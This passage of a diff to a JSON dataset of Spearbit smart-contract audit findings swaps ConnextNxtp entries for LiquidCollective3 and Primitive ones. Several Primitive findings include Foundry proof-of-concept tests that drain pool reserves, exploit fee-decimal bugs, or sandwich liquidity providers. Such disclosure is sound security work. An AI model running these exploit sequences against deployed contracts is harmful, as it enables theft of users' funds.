In case Arborist starts misbehaving (compromised or security issue) then there is no way to remove this Arborist from the whitelist.", + "title": "Document/mark unused (would-be-stale) storage parameters after migration", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The following storage parameters will be unused after the migration of the protocol to v1 CLValidatorCount CLValidatorTotalBalance LastOracleRoundId.sol OperatorsV1, this will be more than one slot (it occupies regions of storage) ReportVariants, the slot has been changed (that means right after migration ReportVariants will be an empty array by default): - bytes32 internal constant REPORTS_VARIANTS_SLOT = bytes32(uint256(keccak256(\"river.state.reportsVariants\")) - 1); + bytes32 internal constant REPORT_VARIANTS_SLOT = bytes32(uint256(keccak256(\"river.state.reportVariants\")) - 1);", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "WatcherManager is not set correctly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The setWatcherManager function fails to actually update the watcherManager; instead, it just emits an event stating that the WatcherManager was updated when it was not. This could become a problem once new modules are added/revised in the WatcherManager contract and WatcherClient wants to use this upgraded WatcherManager. WatcherClient will be forced to use the outdated WatcherManager contract code.", + "title": "pullEth, pullELFees and pullExceedingEth do not check for a non-zero amount before sending funds to River", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "pullCoverageFunds makes sure that the amount being sent to River is non-zero before calling its corresponding endpoint. This behavior differs from the implementations of pullELFees pullExceedingEth pullEth Not checking for a non-zero value has the added benefit of saving gas when the value is non-zero, while the check for a non-zero value before calling back River saves gas for cases when the amount could be 0.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Check __GAPs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "All __GAPs have the same size, while the different contracts have a different number of storage variables. If the __GAP size isn't logical it is more difficult to maintain the code. Note: set to a risk rating of medium because the probability of something going wrong with future upgrades is low to medium, and the impact of mistakes would be medium to high.
LPToken.sol: uint256[49] private __GAP; // should probably be 50 OwnerPausableUpgradeable.sol: uint256[49] private __GAP; // should probably be 50 StableSwap.sol: uint256[49] private __GAP; // should probably be 48 Merkle.sol: uint256[49] private __GAP; // should probably be 48 ProposedOwnable.sol: uint256[49] private __GAP; // should probably be 47", + "title": "Protocol fees are double-counted as registry balance and pool reserve", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "When swapping, the registry is credited a protocolFee. However, this fee is always reinvested in the pool, meaning the virtualX or virtualY pool reserves per liquidity increase by protocolFee / liquidity. The protocol fee is now double-counted as the registry's user balance and the pool reserve, while the global reserves are only increased by the protocol fee once in _increaseReserves(_state.tokenInput, iteration.input). A protocol fee breaks the invariant that the global reserve should be greater than the sum of user balances and fees plus the sum of pool reserves. As the protocol fee is reinvested, LPs can withdraw it. If users and LPs decide to withdraw all their balances, the registry can't withdraw their fees anymore. Conversely, if the registry withdraws the protocol fee, not all users can withdraw their balances anymore. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { function test_protocol_fee_reinvestment() public noJit defaultConfig useActor usePairTokens(100e18) allocateSome(10e18) // deltaLiquidity isArmed { // Set fee, 1/5 = 20% SimpleRegistry(subjects().registry).setFee(address(subject()), 5); // swap // make invariant go negative s.t. all fees are reinvested, not strictly necessary vm.warp(block.timestamp + 1 days); uint128 amtIn = 1e18; bool sellAsset = true; uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); // deallocate and earn reinvested LP fees + protocol fees, emptying _entire_ reserve including protocol fees subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: false, useMax: uint8(1), poolId: ghost().poolId, deltaLiquidity: 0 // useMax will set this to freeLiquidity }) ); subject().draw(ghost().asset().to_addr(), type(uint256).max, actor()); uint256 protocol_fee = ghost().balance(subjects().registry, ghost().asset().to_addr()); assertEq(protocol_fee, amtIn / 100 / 5); // 20% of 1% of 1e18 // the global reserve is 0 even though the protocol fee should still exist uint256 reserve_asset = ghost().reserve(ghost().asset().to_addr()); assertEq(reserve_asset, 0); // reverts with InsufficientReserve(0, 2000000000000000) SimpleRegistry(subjects().registry).claimFee( address(subject()), ghost().asset().to_addr(), protocol_fee, address(this) ); } }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "Primitive", + "Severity: Critical Risk" ] }, { - "title": "Message can be delivered out of order", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Messages can be delivered out of order on the spoke.
Anyone can call the permissionless proveAndProcess to process the messages in any order they want. A malicious user can force the spoke to process messages in a way that is beneficial to them (e.g., front-run).", + "title": "LP fees are in WAD instead of token decimal units", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "When swapping, deltaInput is in WAD (not token decimals) units. Therefore, feeAmount is also in WAD as a percentage of deltaInput. When calling _feeSavingEffects(args.poolId, iteration) to determine whether to reinvest the fees in the pool or earmark them for LPs, a _syncFeeGrowthAccumulator is done with the following parameter: _syncFeeGrowthAccumulator(FixedPointMathLib.divWadDown(iteration.feeAmount, iteration.liquidity)) This is a WAD per liquidity value stored in _state.feeGrowthGlobal and also in pool.feeGrowthGlobalAsset through a subsequent _syncPool call. If an LP claims now and their fees are synced with syncPositionFees, their tokensOwed is set to: uint256 differenceAsset = AssemblyLib.computeCheckpointDistance( feeGrowthAsset=pool.feeGrowthGlobalAsset, self.feeGrowthAssetLast ); feeAssetEarned = FixedPointMathLib.mulWadDown(differenceAsset, self.freeLiquidity); self.tokensOwedAsset += SafeCastLib.safeCastTo128(feeAssetEarned); Then tokensOwedAsset is increased by a WAD value (WAD per WAD liquidity multiplied by WAD liquidity) and they are credited this WAD value with _applyCredit(msg.sender, asset, claimedAssets) which they can then withdraw as a token decimal value. The result is that LP fees are credited and can be withdrawn as WAD units and tokens with fewer than 18 decimals can be stolen from the protocol. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { function test_fee_decimal_bug() public sixDecimalQuoteConfig useActor usePairTokens(31e18) allocateSome(100e18) // deltaLiquidity isArmed { // Understand current pool values. create pair initializes from price // DEFAULT_STRIKE=10e18 = 10.0 quote per asset = 1e7/1e18 = 1e-11 uint256 reserve_asset = ghost().reserve(ghost().asset().to_addr()); uint256 reserve_quote = ghost().reserve(ghost().quote().to_addr()); assertEq(reserve_asset, 30.859596948332370800e18); assertEq(reserve_quote, 308.595965e6); // Do swap from quote -> asset, so we catch fee on quote bool sellAsset = false; // amtIn is in quote. gets scaled to WAD in `_swap`. uint128 amtIn = 100; // 0.0001$ ~ 1e14 iteration.input uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); { } // verify that before swap, we have no credit uint256 credited = ghost().balance(actor(), ghost().quote().to_addr()); assertEq(credited, 0, \"token-credit\"); uint256 pre_swap_balance = ghost().quote().to_token().balanceOf(actor()); subject().multiprocess( FVMLib.encodeSwap( uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ?
1 : 0) ) ); subject().multiprocess( // claim it all FVMLib.encodeClaim(ghost().poolId, type(uint128).max, type(uint128).max) ); // we got credited tokensOwed = 1% of 1e14 input = 1e12 quote tokens uint256 credited = ghost().balance(actor(), ghost().quote().to_addr()); assertEq(credited, 1e12, \"tokens-owed\"); // can withdraw the credited tokens, would underflow reserve, so just rug the entire reserve reserve_quote = ghost().reserve(ghost().quote().to_addr()); subject().draw(ghost().quote().to_addr(), reserve_quote, actor()); uint256 post_draw_balance = ghost().quote().to_token().balanceOf(actor()); // -amtIn because reserve_quote already got increased by it, otherwise we'd be double-counting assertEq(post_draw_balance, pre_swap_balance + reserve_quote - amtIn, \"post-draw-balance-mismatch\"); } }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "Primitive", + "Severity: Critical Risk" ] }, { - "title": "Extra checks in _verifySender() of GnosisBase", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "According to the Gnosis bridge documentation the source chain id should also be checked using messageSourceChainId(). This is because in the future the same arbitrary message bridge contract could handle requests from different chains. If a malicious actor were able to gain access to the contract at mirrorConnector on a to-be-supported chain that is not the MIRROR_DOMAIN, they can send an arbitrary root to this mainnet/L1 hub connector which the connector would mark as coming from the MIRROR_DOMAIN. So the attacker can spoof/forge function calls and asset transfers by creating a payload root and using this along with their access to mirrorConnector on that chain to send a cross-chain processMessage to the Gnosis hub connector, and afterwards they can use their payload root and proofs to forge/spoof transfers on the L1 chain. Although it is unlikely that any other party could add a contract with the same address as _amb on another chain, it is safer to add additional checks. function _verifySender(address _amb, address _expected) internal view returns (bool) { require(msg.sender == _amb, \"!bridge\"); return GnosisAmb(_amb).messageSender() == _expected; }", + "title": "Swaps can be done for free and steal the reserve given large liquidity allocation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "A swap of inputDelta tokens for outputDelta tokens is accepted if the invariant after the swap did not decrease. The after-swap invariant is recomputed using the pool's new virtual reserves (per liquidity) virtualX and virtualY: // becomes virtualX (reserveX) if swapping X -> Y nextIndependent = liveIndependent + deltaInput.divWadDown(iteration.liquidity); // becomes virtualY (reserveY) if swapping X -> Y nextDependent = liveDependent - deltaOutput.divWadDown(iteration.liquidity); // in checkInvariant int256 nextInvariant = RMM01Lib.invariantOf({ self: pools[poolId], R_x: reserveX, R_y: reserveY, timeRemainingSec: tau }); require(nextInvariantWad >= prevInvariant); When iteration.liquidity is sufficiently large the integer division deltaOutput.divWadDown(iteration.liquidity) will return 0, resulting in an unchanged pool reserve instead of a decreased one. The invariant check will pass even without transferring any input amount deltaInput as the reserves are unchanged. The swapper will be credited deltaOutput tokens.
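The rounding can be written out with the numbers used in the steps and POC that follow (divWadDown(a, b) is a truncating fixed-point division, a * 1e18 / b):

// deltaOutput         = 100e18
// iteration.liquidity ~ 1.1e38 (the attacker-allocated amount)
// deltaOutput.divWadDown(liquidity) = 100e18 * 1e18 / 1.1e38 = 1e38 / 1.1e38 = 0
// => nextDependent == liveDependent, the virtual reserves never move, and the invariant check passes.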
The attacker needs to first increase the liquidity to a large amount (>2**126 in the POC) such that they can steal the entire asset reserve (100e18 asset tokens in the POC): This can be done using multiprocess to: 1. allocate > 1.1e38 liquidity. 2. swap with input = 1 (to avoid the 0-swap revert) and output = 100e18. The new virtualX asset will be computed as liveDependent - deltaOutput.divWadDown(iteration.liquidity) = liveDependent - 100e18 * 1e18 / 1.1e38 = liveDependent - 0 = liveDependent, leaving the virtual pool reserves unchanged and passing the invariant check. This credits 100e18 to the attacker when settled, as the global reserves (__account__.reserve) are decreased (but not the actual contract balance). 3. deallocate the > 1.1e38 free liquidity again. As the virtual pool reserves virtualX/Y remained unchanged throughout the swap, the same allocated amount is credited again. Therefore, the allocation / deallocation doesn't require any token settlement. 4. settlement is called and the attacker needs to pay the swap input amount of 1 wei and is credited the global reserve decrease of 100e18 assets from the swap. Note that this attack requires a JIT parameter of zero in order to deallocate in the same block as the allocation. However, given sufficient capital combined with an extreme strike price or future cross-block flashloans, this attack is also possible with JIT > 0. Attackers can perform this attack in their own pool with one malicious token and one token they want to steal. The malicious token comes with functionality to disable anyone else from trading so the attacker is the only one who can interact with their custom pool. This reduces any risk of this attack while waiting for the deallocation in a future block. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"contracts/libraries/RMM01Lib.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { using RMM01Lib for PortfolioPool; // sorry, didn't know how to use the modifiers for testing 2 actors at the same time function test_virtual_reserve_unchanged_bug() public noJit defaultConfig { /////// SETUP /////// uint256 initialBalance = 100 * 1e18; address victim = address(actor()); vm.startPrank(victim); // we want to steal the victim's asset ghost().asset().prepare(address(victim), address(subject()), initialBalance); subject().fund(ghost().asset().to_addr(), initialBalance); vm.stopPrank(); // we need to prepare a tiny quote balance for attacker because we cannot set input = 0 for a swap
address attacker = address(0x54321); addGhostActor(attacker); setGhostActor(attacker); vm.startPrank(attacker); ghost().quote().prepare(address(attacker), address(subject()), 2); vm.stopPrank(); uint256 maxVirtual; { // get the virtualX/Y from pool creation PortfolioPool memory pool = ghost().pool(); (uint256 x, uint256 y) = pool.getVirtualPoolReservesPerLiquidityInWad(); console2.log("getVirtualPoolReservesPerLiquidityInWad: %s \t %y \t %s", x, y); maxVirtual = y; } /////// ATTACK /////// // attacker provides max liquidity, swaps for free, removes liquidity, is credited funds vm.startPrank(attacker); bool sellAsset = false; uint128 amtIn = 1; uint128 amtOut = uint128(initialBalance); // victim's funds bytes[] memory instructions = new bytes[](3); uint8 counter = 0; instructions[counter++] = FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, // getPoolLiquidityDeltas(int128 deltaLiquidity) does virtualY.mulDivUp(delta, scaleDownFactorAsset).safeCastTo128() // virtualY * deltaLiquidity / 1e18 <= uint128.max => deltaLiquidity <= uint128.max * 1e18 / virtualY. // this will end up supplying deltaLiquidity such that the uint128 cast on deltaQuote won't overflow (deltaQuote ~ uint128.max) // deltaLiquidity = 110267925102637245726655874254617279807 > 2**126 deltaLiquidity: uint128((uint256(type(uint128).max) * 1e18) / maxVirtual) }); // the main issue is that the invariant doesn't change, so the checkInvariant passes // the reason why the invariant doesn't change is because the virtualX/Y doesn't change // the reason why virtualY doesn't change even though we have deltaOutput = initialBalance (100e18) // is that the previous allocate increased the liquidity so much that: // nextDependent = liveDependent - deltaOutput.divWadDown(iteration.liquidity) = liveDependent // the deltaOutput.divWadDown(iteration.liquidity) is 0 because: // 100e18 * 1e18 / 110267925102637245726655874254617279807 = 1e38 / 1.1e38 = 0 instructions[counter++] = FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0)); instructions[counter++] = FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: false, useMax: uint8(1), poolId: ghost().poolId, deltaLiquidity: 0 // useMax makes us deallocate our entire freeLiquidity }); subject().multiprocess(FVM.encodeJumpInstruction(instructions)); uint256 attacker_asset_balance = ghost().balance(attacker, ghost().asset().to_addr()); assertGt(attacker_asset_balance, 0); console2.log("attacker asset profit: %s", attacker_asset_balance); // attacker can withdraw victim's funds, leaving victim unable to withdraw subject().draw(ghost().asset().to_addr(), type(uint256).max, actor()); uint256 attacker_balance = ghost().asset().to_token().balanceOf(actor()); // rounding error of 1 assertEq(attacker_balance, initialBalance - 1, "attacker-post-draw-balance-mismatch"); vm.stopPrank(); } }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "Primitive", + "Severity: Critical Risk" ] }, { - "title": "Absence of Minimum delayBlocks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Owner can accidentally set delayBlocks as 0 (or a very small delay block) which will collapse the whole fraud protection mechanism.
Since there is no check for a minimum delay before setting a new value, even a low value will be accepted by the setDelayBlocks function: function setDelayBlocks(uint256 _delayBlocks) public onlyOwner { require(_delayBlocks != delayBlocks, \"!delayBlocks\"); emit DelayBlocksUpdated(_delayBlocks, delayBlocks); delayBlocks = _delayBlocks; }", + "title": "Unsafe type-casting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "Throughout the contract we've encountered various unsafe type-castings. invariant Within the _swap function, the next invariant is an int256 variable and is calculated within the checkInvariant function implemented in the RMM01Portfolio. This variable is then dangerously type-cast to int128 and assigned to an int256 variable in the iteration struct (L539). The down-casting from int256 to int128 assumes that the nextInvariantWad fits in an int128; in case it won't fit, it will overflow. The updated iteration object is passed to the _feeSavingEffects function, which based on the RMM implementation can lead to bad consequences. iteration.nextInvariant _getLatestInvariantAndVirtualPrice getNetBalance During account settlement, getNetBalance is called to compute the difference between the \"physical reserves\" (contract balance) and the internal reserves: net = int256(physicalBalance) - int256(internalBalance). If the internalBalance > int256.max, it overflows into a negative value and the attacker is credited the entire physical balance + overflow upon settlement (and doesn't have to pay anything in settle). This might happen if an attacker allocates or swaps in very high amounts before settlement is called. Consider doing a safe typecast here as a legitimate possible revert would cause fewer issues than an actual overflow. Encoding / Decoding functions The encoding and decoding functions in FVMLib perform many unsafe typecasts and will truncate values. This can result in a user calling functions with unexpected parameters if they use a custom encoding. Consider using safe type-casts here. encodeJumpInstruction: cannot encode more than 255 instructions, instructions will be cut off and they might perform an action that will then be settled unfavorably. decodeClaim: fee0/fee1 can overflow decodeCreatePool: price := mul(base1, exp(10, power1)) can overflow and the pool is initialized wrong decodeAllocateOrDeallocate: deltaLiquidity := mul(base, exp(10, power)) can overflow and would provide less liquidity decodeSwap: input / output := mul(base1, exp(10, power1)) can overflow, potentially leading to unfavorable swaps Other PortfolioLib.getPoolReserves: int128(self.liquidity). This could be a safe typecast, the function is not used internally. AssemblyLib.toAmount: The typecast works if power < 39, otherwise leads to wrong results without reverting. This function is not used yet but consider performing a safe typecast here.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "Primitive", + "Severity: High Risk" ] }, { - "title": "Add extra 0 checks in verifyAggregateRoot() and proveMessageRoot()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The functions verifyAggregateRoot() and proveMessageRoot() verify and confirm roots. A root value of 0 is a special case. If this value would be allowed, then the functions could allow invalid roots to be passed.
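A minimal sketch of the guard that the snippet quoted next lacks (the revert string is illustrative, not the codebase's):

function verifyAggregateRoot(bytes32 _aggregateRoot) internal {
    require(_aggregateRoot != bytes32(0), "!root"); // reject the special zero value before any lookups
    if (provenAggregateRoots[_aggregateRoot]) {
        return;
    }
    // do several verifications, as before
    provenAggregateRoots[_aggregateRoot] = true;
}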
Currently the functions verifyAggregateRoot() and proveMessageRoot() don't explicitly verify the roots are not 0. function verifyAggregateRoot(bytes32 _aggregateRoot) internal { if (provenAggregateRoots[_aggregateRoot]) { return; } ... // do several verifications provenAggregateRoots[_aggregateRoot] = true; ... } function proveMessageRoot(...) ... { if (provenMessageRoots[_messageRoot]) { return; } ... // do several verifications provenMessageRoots[_messageRoot] = true; }", + "title": "Protocol fees are in WAD instead of token decimal units", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "When swapping, deltaInput is in WAD (not token decimals) units. Therefore, the protocolFee will also be in WAD as a percentage of deltaInput. This WAD amount is then credited to the REGISTRY: iteration.feeAmount = (deltaInput * _state.fee) / PERCENTAGE; if (_protocolFee != 0) { uint256 protocolFeeAmount = iteration.feeAmount / _protocolFee; iteration.feeAmount -= protocolFeeAmount; _applyCredit(REGISTRY, _state.tokenInput, protocolFeeAmount); } The privileged registry can claim these fees using a withdrawal (draw) and the WAD units are not scaled back to token decimal units, resulting in withdrawing more fees than they should have received if the token has fewer than 18 decimals. This will reduce the global reserve by the increased fee amount and break the accounting and functionality of all pools using the token.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: High Risk" ] }, { - "title": "_removeAssetId() should also clear custodied", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In one of the fixes in PR 2530, _removeAssetId() doesn't clear custodied as it is assumed to be 0. function _removeAssetId(...) ... { // NOTE: custodied will always be 0 at this point } However custodied isn't always 0. Suppose cap & custodied have a value (!=0), then _setLiquidityCap() is called to set the cap to 0. The function doesn't reset the custodied value so it will stay at !=0.", + "title": "Invariant.getX computation is wrong", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The protocol makes use of a solstat library to compute the off-chain swap amounts. The solstat's Invariant.getX function documentation states: Computes x in x = 1 - Φ(Φ⁻¹((y + k) / K) + σ√τ). However, the y + k term should be y - k. The off-chain swap amounts computed via getAmountOut return wrong values. Using these values for an actual swap transaction will either (wrongly) revert the swap or overstate the output amounts. Derivation: y = K·Φ(Φ⁻¹(1 - x) - σ√τ) + k  =>  (y - k)/K = Φ(Φ⁻¹(1 - x) - σ√τ)  =>  Φ⁻¹((y - k)/K) + σ√τ = Φ⁻¹(1 - x)  =>  x = 1 - Φ(Φ⁻¹((y - k)/K) + σ√τ)", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: High Risk" ] }, { - "title": "Remove liquidity while paused", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function removeLiquidity() in StableSwapFacet.sol has a whenNotPaused modifier, while the comment shows Liquidity can always be removed, even when the pool is paused.
On the other hand, function removeLiquidity() in StableSwap.sol doesn't have this modifier. StableSwapFacet.sol#L394-L446 // Liquidity can always be removed, even when the pool is paused. function removeLiquidity(...) external ... nonReentrant whenNotPaused ... { ... } function removeLiquidityOneToken(...) external ... nonReentrant whenNotPaused function removeLiquidityImbalance(...) external ... nonReentrant whenNotPaused ... { ... } ... { ... } StableSwap.sol#L394-L446 // Liquidity can always be removed, even when the pool is paused. function removeLiquidity(...) external ... nonReentrant ... { ... } function removeLiquidityOneToken(...) external ... nonReentrant whenNotPaused function removeLiquidityImbalance(...) external ... nonReentrant whenNotPaused ... { ... } ... { ... }", + "title": "Liquidity can be (de-)allocated at a bad price", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "To allocate liquidity to a pool, a single uint128 liquidityDelta parameter is specified. The required deltaAsset and deltaQuote token amounts are computed from the current virtualX and virtualY token reserves per liquidity (prices). An MEV searcher can sandwich the allocation transaction with swaps that move the price in an unfavorable way, such that the allocation happens at a time when the virtualX and virtualY variables are heavily skewed. The MEV searcher makes a profit and the liquidity provider will automatically be forced to use undesired token amounts. In the provided test case, the MEV searcher makes a profit of 2.12e18 X and the LP uses 9.08e18 X / 1.08 Y instead of the expected 3.08 X / 30.85 Y. LPs will incur a loss, especially if the asset (X) is currently far more valuable than the quote (Y). // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"contracts/libraries/RMM01Lib.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { using RMM01Lib for PortfolioPool; // sorry, didn't know how to use the modifiers for testing 2 actors at the same time function test_allocate_sandwich() public defaultConfig { uint256 initialBalance = 100e18; address victim = address(actor()); address mev = address(0x54321); ghost().asset().prepare(address(victim), address(subject()), initialBalance); ghost().quote().prepare(address(victim), address(subject()), initialBalance); addGhostActor(mev); setGhostActor(mev); vm.startPrank(mev); // need to prank here for approvals in `prepare` to work ghost().asset().prepare(address(mev), address(subject()), initialBalance); ghost().quote().prepare(address(mev), address(subject()), initialBalance); vm.stopPrank(); vm.startPrank(victim); subject().fund(ghost().asset().to_addr(), initialBalance); subject().fund(ghost().quote().to_addr(), initialBalance); vm.stopPrank(); vm.startPrank(mev); subject().fund(ghost().asset().to_addr(), initialBalance); subject().fund(ghost().quote().to_addr(), initialBalance); vm.stopPrank(); // 0. some user provides initial liquidity, so MEV can actually swap in the pool vm.startPrank(victim); subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, deltaLiquidity: 10e18 }) ); vm.stopPrank(); // 1.
MEV swaps, changing the virtualX/Y LP price (skewing the reserves) vm.startPrank(mev); uint128 amtIn = 6e18; bool sellAsset = true; uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); vm.stopPrank(); // 2. victim allocates { uint256 victim_asset_balance = ghost().balance(victim, ghost().asset().to_addr()); uint256 victim_quote_balance = ghost().balance(victim, ghost().quote().to_addr()); vm.startPrank(victim); subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, deltaLiquidity: 10e18 }) ); vm.stopPrank(); PortfolioPool memory pool = ghost().pool(); (uint256 x, uint256 y) = pool.getVirtualPoolReservesPerLiquidityInWad(); console2.log("getVirtualPoolReservesPerLiquidityInWad: %s \t %y \t %s", x, y); victim_asset_balance -= ghost().balance(victim, ghost().asset().to_addr()); victim_quote_balance -= ghost().balance(victim, ghost().quote().to_addr()); console2.log( "victim used asset/quote for allocate: %s \t %y \t %s", victim_asset_balance, victim_quote_balance ); // w/o sandwich: 3e18 / 30e18 } // 3. MEV swaps back, ending up with more tokens than their initial balance vm.startPrank(mev); sellAsset = !sellAsset; amtIn = amtOut; // @audit-issue this only works after patching Invariant.getX to use y - k. still need to reduce the amtOut a tiny bit because of rounding errors amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)) * (1e4 - 1) / 1e4; subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); vm.stopPrank(); uint256 mev_asset_balance = ghost().balance(mev, ghost().asset().to_addr()); uint256 mev_quote_balance = ghost().balance(mev, ghost().quote().to_addr()); assertGt(mev_asset_balance, initialBalance); assertGe(mev_quote_balance, initialBalance); console2.log( "MEV asset/quote profit: %s \t %s", mev_asset_balance - initialBalance, mev_quote_balance - initialBalance ); } }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "Primitive", + "Severity: High Risk" ] }, { - "title": "Relayers can frontrun each other's calls to BridgeFacet.execute", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Relayers can front-run each other's calls to BridgeFacet.execute. Currently, there is no on-chain mechanism to track how many fees should be allocated to each relayer. All the transfer bump fees are funneled into one address s.relayerFeeVault.", + "title": "Missing signextend when dealing with non-full word signed integers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The AssemblyLib uses non-full-word signed integer operations. If the signed data on the stack have not been sign-extended, the two's complement arithmetic will not work properly, most probably reverting.
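For illustration, a minimal sketch of the manual cleanup (the helper name is hypothetical; signextend(0, x) re-extends the sign bit of a one-byte value to the full word):

function sdivInt8(int8 a, int8 b) internal pure returns (int256 r) {
    assembly {
        // without these two signextend calls, negative int8 inputs may sit
        // zero-padded on the stack and sdiv would operate on the wrong values
        let aa := signextend(0, a)
        let bb := signextend(0, b)
        r := sdiv(aa, bb)
    }
}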
The Solidity compiler does this cleanup but this cleanup is not guaranteed to be done while using inline assembly.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "OptimismHubConnector.processMessageFromRoot emits MessageProcessed for already processed messages", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Calls to processMessageFromRoot with an already processed _data still emit MessageProcessed. This might cause issues for off-chain agents like relayers monitoring this event.", + "title": "Tokens With Multiple Addresses Can Be Stolen Due to Reliance on balanceOf", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "Some ERC20 tokens have multiple valid contract addresses that serve as entrypoints for manipulating the same underlying storage (such as Synthetix tokens like SNX and sBTC and the TUSD stablecoin). Because the FVM holds all tokens for all pools in the same contract, assumes that a contract address is a unique identifier for a token, and relies on the return value of balanceOf for manipulated tokens to determine what transfers are needed during transaction settlement, multiple entrypoint tokens are not safe to be used in pools. For example, suppose there is a pool with non-zero liquidity where one token has a second valid address. An attacker can atomically create a second pool using the alternate address, allocate liquidity, and then immediately deallocate it. During execution of the _settlement function, getNetBalance will return a positive net balance for the double entrypoint token, crediting the attacker and transferring them the entire balance of the double entrypoint token. This attack only costs gas, as the allocation and deallocation of non-double entrypoint tokens will cancel out.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "Add max cap for domains", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Currently there isn't any cap on the maximum amount of domains which the system can support. If the size of the domains and connectors grows, at some point, due to out-of-gas errors in the updateHashes function, both addDomain and removeDomain could be DoSed.", + "title": "Swap amounts are always estimated with priority fee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "A pool can have a priority fee that is only applied when the pool controller (contract) performs a swap. However, when estimating a swap with getAmountOut the priority fee will always be applied as long as there is a controller and a priority fee. As the priority fee is usually less than the normal fee, the input amount will be underestimated for non-controllers, making it too low and causing the swap to revert.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "In certain scenarios 